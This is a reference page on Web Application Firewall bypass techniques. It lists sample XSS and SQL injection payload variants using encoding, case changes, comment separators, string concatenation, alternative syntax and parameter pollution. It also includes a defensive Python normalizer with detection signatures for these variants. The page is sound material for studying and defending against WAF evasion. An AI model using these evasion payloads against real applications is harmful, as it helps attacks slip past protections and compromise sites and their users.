WAF Bypass

WAF Bypass refers to techniques that evade Web Application Firewall detection, allowing attack payloads to reach the vulnerable application. Bypasses exploit the limitations of signature-based detection and differences between how the WAF and the application behind it parse the same request.

Common Bypass Techniques

Encoding

# URL encoding
<script> → %3Cscript%3E

# Double URL encoding
< → %253C

# Unicode encoding
< → \u003c

# HTML entities
<script> → &lt;script&gt;

Case Manipulation

<ScRiPt>
SeLeCt * FrOm users

Whitespace Alternatives

# Tabs, newlines, comments
SELECT/**/password/**/FROM/**/users
SELECT%09password%09FROM%09users
<script%0d%0a>alert(1)</script>
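
From the defender's side, the encoding, case and whitespace variants above all collapse to the same string if input is canonicalized before signatures are matched. The following is an added example of that normalization step, not code from the original page; the two signatures, `MAX_ROUNDS` and the function names are assumptions for illustration, and the samples are constructed from the variants listed on this page.

```python
import html
import re
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: cap on decode passes to bound work on hostile input
# Assumption: two toy signatures standing in for a real rule set.
SIGNATURES = {
    "xss-script-tag": re.compile(r"<script\b"),
    "sqli-select-from": re.compile(r"\bselect\b.+\bfrom\b"),
}
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_SQL_COMMENT = re.compile(r"/\*(!\d*)?(.*?)\*/", re.S)

def _strip_comment(m):
    # MySQL executes the body of /*! ... */, so keep it; plain comments become a space.
    return f" {m.group(2)} " if m.group(1) else " "

def canonicalize(value):
    """Decode until the value stops changing, then fold comments, whitespace and case."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)          # %3C, and %253C on the next pass
        decoded = html.unescape(decoded)  # &lt; &gt;
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == value:
            break
        value = decoded
    value = _SQL_COMMENT.sub(_strip_comment, value)  # /**/ used as a separator
    value = re.sub(r"\s+", " ", value)               # tab, CR, LF -> one space
    return value.lower().strip()

def matched_rules(value):
    """Return the names of the signatures that fire on the canonical form."""
    canon = canonicalize(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(canon))

# Constructed samples built from the variants listed on this page.
SAMPLES = [
    "%253Cscript%253E",
    "\\u003cScRiPt\\u003e",
    "&lt;script&gt;",
    "<script%0d%0a>",
    "SELECT/**/password/**/FROM/**/users",
    "SeLeCt%09password%09FrOm%09users",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:45} -> {canonicalize(s)!r} {matched_rules(s)}")
```

The decode loop is bounded so that deeply nested encodings cannot be used to exhaust the inspector; a value that is still changing after `MAX_ROUNDS` passes is itself worth flagging.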

String Concatenation

# SQL
SEL' + 'ECT * FROM users
CONCAT('SEL','ECT')

# JavaScript
eval('al'+'ert(1)')

Alternative Syntax

# XSS alternatives
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# SQL alternatives
1 UNION ALL SELECT
1 /*!UNION*/ SELECT

HTTP Parameter Pollution

# Send same parameter twice
?id=1&id=2 UNION SELECT

# The WAF and the backend server may each resolve a repeated parameter differently (first value, last value, or all values joined)

Detection Gaps

  • JSON/XML payloads may not be inspected
  • Multipart form data parsing differences
  • Chunked transfer encoding
  • Protocol-level tricks
